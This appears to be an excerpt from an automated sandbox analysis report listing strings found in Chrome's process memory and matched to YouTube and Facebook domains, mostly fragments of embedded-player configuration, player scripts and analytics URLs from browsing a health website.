Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BCE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}= [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323398475.000028EC04C3A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerConfig\\\":{\\\"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2356104978.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/gobWGqPjLSQ?si\\u003dE-htCYBt9m3YW0ws\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGELnZzhwQ7aDPHBC9mbAFEN68zhwQ66DPHBDmoM8cEIiHsAUQpp3PHBCJsM4cEOvo_hIQr4__EhDk5_8SENyizxwQ9quwBRDdls8cEJmYsQUQ37jOHBDxnLAFEP2czxwQvoqwBRCHrM4cEIjjrwUQ4Z7PHBD-ns8cEODg_xIQiIS4IhCThs8cEIHNzhwQ2oeAExCa9M4cEJybzxwQmY2xBRCe0LAFEPyyzhwQvbauBRCLgoATEMzfrgUQ0-GvBRD-8_8SELvZzhwQyeawBRDqo88cEMyJzxwQt-r-EhCwic8cEIOEuCIQ9v7_EhCU_rAFENeczxwQuOTOHBDw4s4cEMn3rwUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNakEwTnpNd05UVTVOZz09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxiC1vOcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMIx8HznK23jQMV42xMCB1cST25\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFRO_8nQGG9ORNDSzmkPn-
Uo_VeiVfjiwPlQ8ibCpbKGSMTxwT1uceJbejPXkPtxSS6fZPYoJMw_71fzot0Mx1OJrOf2f68RDWLaooVr3MmGoIQB53hXn4k_0fSZd_Yd\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
Source: chrome.exe, 00000000.00000002.2497331456.000028EC04C5D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"INNERTUBE_API_VERSION\":\"v1\",\"INNERTUBE_CLIENT_NAME\":\"WEB_EMBEDDED_PLAYER\",\"INNERTUBE_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT\":{\"client\":{\"hl\":\"en\",\"gl\":\"US\",\"remoteHost\":\"191.101.61.23\",\"deviceMake\":\"\",\"deviceModel\":\"\",\"visitorData\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36,gzip(gfe)\",\"clientName\":\"WEB_EMBEDDED_PLAYER\",\"clientVersion\":\"1.20250519.22.00\",\"osName\":\"Windows\",\"osVersion\":\"10.0\",\"originalUrl\":\"https://www.youtube.com/embed/h15NcT6UXh0?si\\u003dYrXkudamh5IoggTR\",\"platform\":\"DESKTOP\",\"clientFormFactor\":\"UNKNOWN_FORM_FACTOR\",\"configInfo\":{\"appInstallData\":\"CPb6vMEGEODg_xIQgc3OHBCIhLgiEIeszhwQ2oeAExDM364FEOugzxwQvoqwBRCvj_8SEN68zhwQ3ZbPHBD8ss4cEP7z_xIQpp3PHBDT4a8FEIjjrwUQ3KLPHBDhns8cEP2czxwQ5qDPHBDMic8cEL2ZsAUQ37jOHBC52c4cEParsAUQvbauBRCZjbEFEO2gzxwQ8OLOHBDJ968FEOvo_hIQmZixBRCcm88cEPGcsAUQyeawBRC72c4cEJr0zhwQsInPHBDXnM8cEOqjzxwQuOTOHBCe0LAFEIOEuCIQ9v7_EhCJsM4cEP6ezxwQk4bPHBDk5_8SELfq_hIQiIewBRCLgoATEJT-sAUqKENBTVNHQlVULVpxLURKU0NFdmVwMlF2bW9RajU3QVBKM0FVZEJ3PT0%3D\"},\"browserName\":\"Chrome\",\"browserVersion\":\"134.0.0.0\",\"acceptHeader\":\"text/html,application/xhtml+xml,application/xml;q\\u003d0.9,image/avif,image/webp,image/apng,*/*;q\\u003d0.8,application/signed-exchange;v\\u003db3;q\\u003d0.7\",\"deviceExperimentId\":\"ChxOelV3TnpJNE5qWTRNVFF6TkRNMk9ESTVOUT09EPb6vMEGGPb6vMEG\",\"rolloutToken\":\"CLLHipfu3syhbhCrlubnrLeNAxi57PGcrbeNAw%3D%3D\"},\"user\":{\"lockedSafetyMode\":false},\"request\":{\"useSsl\":true},\"clickTracking\":{\"clickTrackingParams\":\"IhMI9d/xnK23jQMVIU5MCB1T1y6N\"},\"thirdParty\":{\"embeddedPlayerContext\":{\"embeddedPlayerEncryptedContext\":\"AD5ZzFTPLYxSer_R5PwkmZS-Tw
4kib1_UG_YuM7PzprIn7h7HloFiT40fhwHmvTcbDZ5mAmX_gi3mQS0IvX9cIfuaL02Wqj7eTV8PMLoUpzaX-xPKwhnTeP7PCHG7qXu9THt\",\"ancestorOriginsSupported\":false}}},\"INNERTUBE_CONTEXT_CLIENT_NAME\":56,\"INNERTUBE_CONTEXT_CLIENT_VERSION\":\"1.20250519.22.00\",\"INNERTUBE_CONTEXT_GL\":\"US\",\"INNERTUBE_CONTEXT_HL\":\"en\",\"LATEST_ECATCHER_SERVICE_TRACKING_PARAMS\":{\"client.name\":\"WEB_EMBEDDED_PLAYER\"},\"LOGGED_IN\":false,\"PAGE_BUILD_LABEL\":\"youtube.player.web_20250519_22_RC00\",\"PAGE_CL\":760609635,\"SERVER_NAME\":\"WebFE\",\"VISITOR_DATA\":\"CgtZeUJvRVhYZXBCMCj2-rzBBjIKCgJVUxIEGgAgUA%3D%3D\",\"WEB_PLAYER_CONTEXT_CONFIGS\":{\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\":{\"rootElementId\":\"movie_player\",\"jsUrl\":\"/s/player/59b252b9/player_ias.vflset/en_US/base.js\",\"cssUrl\":\"/s/player/59b252b9/www-player.css\",\"contextId\":\"WEB_PLAYER_CONTEXT_CONFIG_ID_EMBEDDED_PLAYER\",\"eventLabel\":\"embedded\",\"contentRegion\":\"US\",\"hl\":\"en_US\",\"hostLanguage\":\"en\",\"innertubeApiKey\":\"AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8\",\"innertubeApiVersion\":\"v1\",\"innertubeContextClientVersion\":\"1.20250519.22.00\",\"device\":{
Source: chrome.exe, 00000000.00000003.2343716935.000028EC04BEA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323618407.000028EC04BB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: \"embeddedPlayerMode\\\":\\\"EMBEDDED_PLAYER_MODE_DEFAULT\\\",\\\"embeddedPlayerFlags\\\":{}},\\\"embeddedPlayerContext\\\":{\\\"embeddedPlayerEncryptedContext\\\":\\\"AD5ZzFS_WffsIbEul0CEhgLEMVRDFSsvbzVZoVlGlHnyh7Zsd5DVg6hhlnoUALqsJHS2nzTvLcTJ-e9WEo2RWgTQYeAfghp_xaX95uRDC3BC66dgByAzcif3vsFK7XdBfEcf\\\",\\\"ancestorOriginsSupported\\\":false}}\",\"video_id\":\"FURi5aHgp1g\"},\"POST_MESSAGE_ORIGIN\":\"*\",\"VIDEO_ID\":\"FURi5aHgp1g\",\"DOMAIN_ADMIN_STATE\":\"\"});window.ytcfg.obfuscatedData_ = [];","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: ]Uchrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jschrome-extension://gdaefkejpgkiemlaofpalmlakkmbjdnl/scripts/extension/backgroundV3.jsurrentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false}=(G=+(I=T%16+1,r()|0)*I-I*l- -5880*l+Z[w+11&7]*T*I- -3960*T*l+w+60*l*l+2*T*T*I-120*T*T*l,void 0),Z)[G],Z[(t=w+A,(t|0)-~(t&7)+~t)+(g&2)]=L,Z)[w+(2*(g|0)-(g|2)-(g^2)+2*(~g&2))]=-66,L},q=C),q} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501993718.000028EC06D4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ]Uhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2352502411.000028EC04CA9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2393454896.000028EC04CE1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2323240565.000028EC04C71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _ = [];","currentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":true} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2486385269.000028EC03974000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/base.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2315986851.000028EC0102A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/embed.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2492640929.000028EC04120000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/player_ias.vflset/en_US/remote.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2496640859.000028EC04998000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: _keyhttps://www.youtube.com/s/player/59b252b9/www-embed-player.vflset/www-embed-player.js equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2369861259.000028EC068F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC0458C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: access-control-allow-origin:https://www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2491036779.000028EC0402C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default+ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2470610056.000028EC02614000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2487214642.000028EC03B30000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx 1AE355D2DCEC0EB3AE0A8EFA72B8E40Fcurlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRA5D8 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: eIdx 532A55714A7F9A8B174636802271CCE9curlx=https://www.youtube.com/embed/gobWGqPjLSQ?si=-htCYBtW0ws255C equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2497731752.000028EC04DF8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx B189C27F7A1CB75D4FFD53A8A2E6E020curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaXA492 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2490083566.000028EC03F2C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx C217A1CD521E4119F7A36EFDF877B4D1curlx=https://www.youtube.com/embed/FURi5aHgp1g?si=2rCuE23kHaX4E8A equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si= equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2314698479.000028EC03F04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: eIdx CFFCDE4C3FD32DE3CFDAAB2551ACA955curlx=https://www.youtube.com/embed/h15NcT6UXh0?si=rXkudamggTRB6DF equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2329891050.000028EC04A68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 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
Source: chrome.exe, 00000000.00000002.2442196186.000001E4AF687000.00000004.08000000.00040000.00000007.sdmp String found in binary or memory: event?alt=jsonrentUrl":"https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0ws","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2485632326.000028EC0380C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: f/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2489810514.000028EC03EC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.1816103375.000028EC0336C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: fcoof/embedfdomainowww.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331272566.000028EC0578B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.I.getVideoUrl=function(B,z,T,R,h,W,b){z={list:z};T&&(h?z.time_continue=T:z.t=T);T=b?"music.youtube.com":g.Of(this);h=T==="www.youtube.com";!W&&R&&h?W="https://youtu.be/"+B:g.vo(this)?(W="https://"+T+"/fire",z.v=B):(W&&h?(W=this.protocol+"://"+T+"/shorts/"+B,R&&(z.feature="share")):(W=this.protocol+"://"+T+"/watch",z.v=B),XJ&&(B=fc5())&&(z.ebc=B));return g.Qn(W,z)}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.I.y$u=function(){switch(this.Y.getStatus()){case 1:$c(this,"readable");break;case 5:case 6:case 4:case 7:case 3:$c(this,"error");break;case 8:$c(this,"close");break;case 2:$c(this,"end")}};e6B.prototype.serverStreaming=function(B,z,T,R){var h=this,W=B.substring(0,B.length-R.name.length);return htK(function(b){var l=b.q3,w=b.getMetadata(),q=BWz(h,!1);w=ztd(h,w,q,W+l.getName());var c=TWr(q,l.U,!0);b=l.T(b.nj);q.send(w,"POST",b);return c},this.XR).call(this,R.L(z,T))};WWX.prototype.create=function(B,z){return H45(this.T,this.U+"/$rpc/google.internal.waa.v1.Waa/Create",B,z||{},vPq)};var bhz="://secure-...imrworldwide.com/ ://cdn.imrworldwide.com/ ://aksecure.imrworldwide.com/ ://[^.]*.moatads.com ://youtube[0-9]+.moatpixel.com ://pm.adsafeprotected.com/youtube ://pm.test-adsafeprotected.com/youtube ://e[0-9]+.yt.srs.doubleverify.com www.google.com/pagead/xsul www.youtube.com/pagead/slav".split(" "),YnY=/\bocr\b/;var w0P=/(?:\[|%5B)([a-zA-Z0-9_]+)(?:\]|%5D)/g;Object.assign({},{attributes:{},handleError:function(B){throw B;}},{QTE:!0, equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.Of=function(B){B=mR(B.yW);return B==="www.youtube-nocookie.com"?"www.youtube.com":B}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: g.Ti=function(B){var z=g.Of(B);MZz.includes(z)&&(z="www.youtube.com");return B.protocol+"://"+z}; equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: http://localhost:64111/browse>6https://www.youtube.com/youtubei/v1/log_event?alt=jsonscriptSource equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2439355514.000001E4ACC00000.00000004.00000001.00040000.00000007.sdmp String found in binary or memory: http://localhost:64111/tabstatus//www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/FOHThrive equals www.facebook.com (Facebook)
Source: chrome.exe, 00000000.00000002.2487287792.000028EC03B44000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com/g/collect?v=2&tid=G-WF39Z4TEVT&gtm=45je55k1v9134219030za200&_p=1747926388605&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101509157~103116026~103130495~103130497~103136993~103136995~103200004~103233427~103252644~103252646~103301114~103301116~104506547&gdid=dMDhkMT&cid=1981881509.1747926276&ul=en-us&sr=1280x1024&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&_eu=AEAAAAQ&_s=2&sid=1747926276&sct=1&seg=1&dl=https%3A%2F%2Ffountainofhealth.ca%2Fen&dt=Home%20%7C%20Fountain%20of%20Health&en=scroll&ep.page_placeholder=PLACEHOLDER_page_location&epn.percent_scrolled=90&_et=5&tfd=6282ow,document);\n","currentUrl":"https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaX","inline":true,"dynamic":false} equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2469640808.000028EC02488000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2341068096.000028EC06B20000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2499837074.000028EC06424000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499890214.000028EC06438000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2362150726.000028EC05374000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2483628964.000028EC03604000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483278146.000028EC035BC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2481401055.000028EC0337C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2487618019.000028EC03BAC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/@fountainofhealth2679 equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2474881324.000028EC02C04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.ca_default equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2484400894.000028EC036F9000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+ equals www.youtube.com (Youtube)
Source: chrome.exe, 00000000.00000002.2501591890.000028EC06B12000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/^0https://fountainofhealth.cawww.youtube.com_default+/ equals www.youtube.com (Youtube)
